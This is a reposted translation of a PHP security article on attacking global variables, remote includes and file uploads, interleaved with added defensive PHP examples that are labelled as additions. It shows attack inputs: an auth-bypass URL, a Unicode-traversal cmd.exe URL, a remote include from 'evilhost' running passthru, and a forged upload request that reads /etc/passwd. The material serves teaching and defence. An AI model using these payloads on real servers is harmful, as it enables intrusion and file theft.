Poster: Leehoo (A-), Board: PHP, Title: How to attack common vulnerabilities in PHP programs (1), Site: Wuhan Baiyun Huanghe BBS (Saturday, 30 November 2002, 18:50:19), internal mail

How to attack common vulnerabilities in PHP programs (1)
Original: Shaun Clowes <http://www.securereality.com.au/>
Translation: analysist <http://www.nsfocus.com/>
Source: http://www.china4lert.org
The reason I translated this article is that most articles on CGI security use Perl as their example, and articles dealing specifically with ASP, PHP or JSP security are very rare. Mr. Shaun Clowes' article gives a fairly comprehensive introduction to PHP security; the original can be found at http://www.securereality.com.au/studyinscarlet.txt.
The original is quite long, but a considerable part of it introduces background knowledge of PHP that does not touch on security, so I have not translated those parts. If you want that material, please refer to the original.
This article analyses PHP security from several angles: global variables, remote files, file uploads, library files, session files, data types, and functions that are easy to misuse, and it makes a number of useful suggestions on how to improve the security of PHP programs.
Enough preamble; let's get down to business!
[Global Variables] Variables in PHP do not need to be declared; they are created automatically the first time they are used. They do not need to be typed either; their type is derived automatically from the context. From a programmer's point of view this is extremely convenient, and it is clearly one of the features that make the language so fast to develop in. Once a variable has been created it can be used anywhere in the program. The result is that programmers rarely initialise their variables; after all, when a variable is first created it is empty.
Obviously, the main job of a PHP-based application is usually to accept user input (mainly form variables, uploaded files and cookies), process that input, and return the result to the client browser. To make access to user input as easy as possible, PHP actually turns the input data into global variables.
For example :
<FORM METHOD="GET" ACTION="test.php">
<INPUT TYPE="TEXT" NAME="hello">
<INPUT TYPE="SUBMIT">
</FORM>
Obviously, this shows a text box and a submit button. When the user presses the submit button, test.php is called to process the user's input, and while test.php runs, $hello will contain whatever the user typed into the text box. From this we should see that an attacker can create arbitrary global variables at will. If, instead of using the form to submit input to test.php, the attacker types http://server/test.php?hello=hi&setup=no directly into the browser's address bar, then not only is $hello created, $setup is created as well.
Translator's note: these are what we usually call the "POST" and "GET" methods. The following user-authentication code shows the security problem that global variables create:
<?php
if ($pass == "hello")
    $auth = 1;
...
if ($auth == 1)
    echo "some important information";
?>
The code above first checks whether the user's password is "hello"; if it matches, $auth is set to 1, meaning that authentication has passed. Later, if $auth is 1, it prints some important information.
This looks correct, and quite a few of us are doing exactly this, but the code makes a fatal mistake: it assumes that $auth is empty unless it has been set, forgetting that an attacker can create any global variable and give it any value. With a URL like http://server/test.php?auth=1 we can fool this code into believing we have already been authenticated.
Therefore, to improve the security of PHP programs, we must not trust any variable that has not been explicitly defined. If the program has many variables, this is a very arduous task.
A commonly used protection is to check the HTTP_GET_VARS[] or HTTP_POST_VARS[] arrays, depending on how the form is submitted (GET or POST). When PHP's "track_vars" option is enabled (which is the default), user-submitted variables are available both as global variables and in the arrays mentioned above.
It is worth noting, however, that PHP uses four different arrays to handle user input. HTTP_GET_VARS holds variables submitted via GET, HTTP_POST_VARS those submitted via POST, HTTP_COOKIE_VARS those submitted as cookies, and HTTP_POST_FILES (only in relatively new PHP versions) is an entirely different way for the user to submit variables. A single user request can very easily place variables in all four arrays, so a secure PHP program should check all four.
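The authentication check from the text, rewritten so that it no longer depends on PHP turning request parameters into globals. This is an added example, not code from the article; $VALID_PASSWORD is a placeholder for whatever credential store the application really uses, and $_POST is the modern name of the HTTP_POST_VARS array mentioned above (the automatic creation of globals described in the text is PHP's register_globals setting, off by default since PHP 4.2 and removed in PHP 5.4). The two defences shown are the ones the text asks for: initialise the flag before use, and read input only from the request array you intend to trust.

```php
<?php
// Added example, not part of the original article.
// Placeholder credential; a real application would compare against a
// salted hash, not a literal string.
$VALID_PASSWORD = 'hello';

// Decide whether the submitted form authenticates the user.
// $post is the array of POST variables; nothing else is consulted, so a
// value smuggled in via ?auth=1 (GET) or a cookie has no effect.
function is_authenticated(array $post, $valid_password)
{
    // Explicit initialisation: the flag starts false no matter what the
    // request contained. This is the line the vulnerable code is missing.
    $auth = 0;

    if (isset($post['pass']) && is_string($post['pass'])
        && hash_equals($valid_password, $post['pass'])) {
        // hash_equals() compares in constant time, avoiding a timing side
        // channel on the password comparison.
        $auth = 1;
    }

    return $auth === 1;
}

if (is_authenticated($_POST, $VALID_PASSWORD)) {
    echo "some important information\n";
} else {
    echo "access denied\n";
}
?>
```

Because $auth is assigned inside the function from a known starting value, there is no moment at which an attacker-supplied global of the same name can stand in for a passed check, and the function can be unit-tested by passing constructed arrays for $post.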
[Remote Files] PHP is a feature-rich language with a great many functions, so implementing a given piece of functionality is easy. From a security point of view, however, the more functions there are, the harder it is to keep things safe, and remote files are a good example of this:
<?php
if (!($fd = fopen("$filename", "r")))
    echo("Could not open file: $filename\n");
?>
The script above tries to open the file $filename and prints an error message if that fails. Obviously, if we can specify $filename, we can use this script to access any file on the system. But the script also has a less obvious property: it can read files from any other FTP or Web site, because the majority of PHP's file-handling functions handle remote files transparently.
For example, if $filename is set to "http://target/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir", the code above is effectively used to trigger the Unicode vulnerability on the target server and run a command there.
This becomes even more interesting with include(), require(), include_once() and require_once(), which also support remote files. The main purpose of these functions is to include the contents of the specified file and interpret it as PHP code; they are mainly used for library files.
For example:
<?php
include($libdir . "/languages.php");
?>
In the example above, $libdir is a path that is supposed to be set before this code runs; if the attacker can arrange for $libdir not to have been set, he can change the path. On its own that gains the attacker little, because he can only reach a languages.php inside the path he specifies (Perl's "poison null byte" attack has no effect on PHP). With remote-file support, however, the attacker can do anything he likes. For example, he can place a languages.php on some server with the following content:
<?php
passthru("/bin/ls /etc");
?>
and then set $libdir to "http://<evilhost>/", so that the above code is executed on the target host and the listing of /etc is returned to the client's browser.
Note that the attacking server (i.e. evilhost) must not itself execute PHP code, otherwise the attack code runs on the attacking server instead of the target. For the technical details, see http://www.securereality.com.au/sradv00006.txt
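The defensive counterpart to the $libdir example above: an include path that is chosen from a fixed table and then verified to lie inside the library directory, so that neither a remote URL nor a traversal string can reach include(). This is an added example, not code from the article; LIB_ROOT, the $LIBRARIES table and the ?lib= parameter are constructed for the illustration. As defence in depth, the php.ini directives allow_url_fopen and allow_url_include (both real PHP settings) can also be set to Off, which removes remote-file support from fopen() and from the include family respectively.

```php
<?php
// Added example, not part of the original article.
define('LIB_ROOT', '/var/www/app/lib');   // constructed path for this example

// Only names present in this table can ever be included. The user supplies
// a key, never a path, so "$libdir" is no longer attacker-influenced.
$LIBRARIES = array(
    'languages' => 'languages.php',
    'themes'    => 'themes.php',
);

// Resolve a library key to an absolute path, or return false if the key is
// unknown or the resolved file is not inside $root.
function resolve_library($key, array $allowed, $root)
{
    if (!is_string($key) || !isset($allowed[$key])) {
        return false;                                   // unknown key: refuse
    }

    $root_real = realpath($root);
    $path      = realpath($root . '/' . $allowed[$key]);

    // realpath() returns false for a missing file and collapses any "..",
    // so a prefix comparison against the canonical root is a reliable
    // containment check even if the table were ever misconfigured.
    if ($root_real === false || $path === false) {
        return false;
    }
    if (strncmp($path, $root_real . '/', strlen($root_real) + 1) !== 0) {
        return false;                                   // escaped the root
    }
    return $path;
}

$key = isset($_GET['lib']) ? $_GET['lib'] : '';
$lib = resolve_library($key, $LIBRARIES, LIB_ROOT);

if ($lib === false) {
    header('HTTP/1.0 400 Bad Request');
    exit("unknown library\n");
}

// $lib is a local, canonical path under LIB_ROOT; a value such as
// "http://<evilhost>/" can never reach this statement.
include $lib;
?>
```

The allowlist alone closes the hole described in the text; the realpath() containment check is there so that a later editing mistake in the table (for example an entry containing "..") still cannot expose files outside the library directory.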
[File Upload] PHP automatically supports RFC 1867 file uploads. Consider the following example:
<FORM METHOD="POST" ENCTYPE="multipart/form-data">
<INPUT TYPE="FILE" NAME="hello">
<INPUT TYPE="HIDDEN" NAME="MAX_FILE_SIZE" VALUE="10240">
<INPUT TYPE="SUBMIT">
</FORM>
The code above lets the user choose a file on the local machine; when submit is clicked, the file is uploaded to the server. This is obviously a very useful feature, but the way PHP responds to it is insecure. When PHP first receives such a request, even before the PHP script is invoked to parse it, PHP accepts the file from the remote user and checks whether its length exceeds the value defined by the $MAX_FILE_SIZE variable; if the file passes these checks, it is stored in a local temporary directory.
Therefore an attacker can send any file to a host running PHP: before the PHP program has decided whether or not to accept the file, it is already on the server.
I will not discuss here the possibility of using file uploads to mount a DoS attack on the server.
Let us consider how PHP programs handle uploaded files. As we just said, the file is received and stored on the server (the location is specified in the configuration file, usually /tmp), generally with a random name such as "phpxXuoXG". The PHP program needs information about the file in order to process it, and this can be obtained in two ways: one that has been in use since PHP 3, and the other that was introduced after the security advisory mentioned earlier.
However, we can say with certainty that the problem still exists, because most PHP programs still use the old way of handling uploaded files. PHP sets up four global variables describing the uploaded file; for the example above they are:
$hello      = filename on the local machine (e.g. "/tmp/phpxXuoXG")
$hello_size = size of the file in bytes (e.g. 1024)
$hello_name = the original name of the file on the remote system (e.g. "C:\\temp\\hello.txt")
$hello_type = MIME type of the uploaded file (e.g. "text/plain")
The PHP program then processes the file named by $hello. The problem is that $hello need not be a variable set by PHP; any remote user can specify it. If we use the following request:
http://vulnhost/vuln.php?hello=/etc/passwd&hello_size=10240&hello_type=text/plain&hello_name=hello.txt
PHP will produce the following global variables (the same can be done with POST, or even with cookies):
$hello      = "/etc/passwd"
$hello_size = 10240
$hello_type = "text/plain"
$hello_name = "hello.txt"
The form data above exactly matches the variables the PHP program expects, but this time the PHP program is no longer handling an uploaded file; it is handling /etc/passwd (which usually leads to its contents being exposed). This attack can be used to expose the contents of any sensitive file.
I said earlier that newer versions of PHP use HTTP_POST_FILES[] to describe uploaded files and also provide many functions to solve this problem, for instance a function to determine whether a given file really is an uploaded file. These functions solve the issue satisfactorily, but in fact I am sure that many PHP programs still use the old method and are very vulnerable to this attack.
File uploads support a variety of attack methods. Consider the following piece of code:
<?php
if (file_exists($theme))   // checks that the file exists on the local system (no remote files)
    include("$theme");
?>
If the attacker can control $theme, it is clear that he can use it to read any file on the remote system. The attacker's ultimate goal is to execute arbitrary commands on the remote server, but he cannot use remote files here, so he must somehow create a PHP file on the remote server. At first glance that seems impossible, but file upload comes to the attacker's aid: if he creates a form containing a file field named "theme" and uses it to submit a file containing PHP code to the code above, PHP saves the submitted file and sets $theme to the name of the saved file; the file_exists() check passes and the attacker's code is executed.
Once able to execute arbitrary commands, the attacker obviously wants to raise his privileges or extend the result, which in turn requires tools that are not available on the server, and file upload once again helps out. The attacker can use file upload to put the tools on the server, then use his ability to run commands to chmod() them and execute them. For example, the attacker can bypass a firewall or IDS in this way to upload a local root exploit, run it, and obtain root privileges.
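Handling the "hello" upload from the form above with the newer interface the text refers to, so that neither the /etc/passwd substitution nor the $theme trick works. This is an added example, not code from the article; UPLOAD_DIR and MAX_BYTES are constructed for the illustration, and $_FILES is the modern name of the HTTP_POST_FILES array. The "function to determine whether a given file really is an uploaded file" mentioned in the text is is_uploaded_file(); move_uploaded_file() performs the same check before moving the file. The example is also why the $theme code is unsafe: an uploaded file is stored under a server-chosen name and never passed to include(), only to the file system.

```php
<?php
// Added example, not part of the original article.
define('UPLOAD_DIR', '/var/www/app/uploads');   // constructed; keep it outside the web root
define('MAX_BYTES', 10240);                      // same limit as MAX_FILE_SIZE in the form

// Validate one entry of $_FILES and move it into $dest_dir.
// Returns the stored file name on success, or a short error string.
function store_upload(array $file, $dest_dir, $max_bytes)
{
    // Every field of $file is produced by PHP's own upload handler, not by
    // the client, so it cannot be forged the way $hello/$hello_size could.
    if (!isset($file['tmp_name'], $file['error'], $file['size'])) {
        return 'no upload';
    }
    if ($file['error'] !== UPLOAD_ERR_OK) {
        return 'upload failed';
    }
    // MAX_FILE_SIZE in the form is only advisory to the browser; enforce the
    // limit server-side as well.
    if ($file['size'] > $max_bytes) {
        return 'too large';
    }
    // The check the text alludes to: was this path really created by the
    // upload handler? A request that merely names /etc/passwd fails here.
    if (!is_uploaded_file($file['tmp_name'])) {
        return 'not an upload';
    }

    // Never reuse the client-supplied name ($hello_name in the old scheme);
    // it may contain "..", "/" or a ".php" extension. Pick our own name and
    // a neutral extension instead.
    $safe_name = bin2hex(random_bytes(8)) . '.dat';
    $dest      = $dest_dir . '/' . $safe_name;

    // move_uploaded_file() repeats the is_uploaded_file() check internally.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'store failed';
    }
    return $safe_name;
}

$entry  = isset($_FILES['hello']) ? $_FILES['hello'] : array();
$result = store_upload($entry, UPLOAD_DIR, MAX_BYTES);
echo "result: $result\n";
?>
```

Storing the file under a random name with a fixed extension in a directory the web server does not execute scripts from means that, even if an attacker uploads PHP source, there is no path by which it is ever interpreted; the stored name is data to be served or processed, never an argument to include().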
(To be continued)
--
Source: Wuhan Baiyun Huanghe BBS bbs.whnet.edu.cn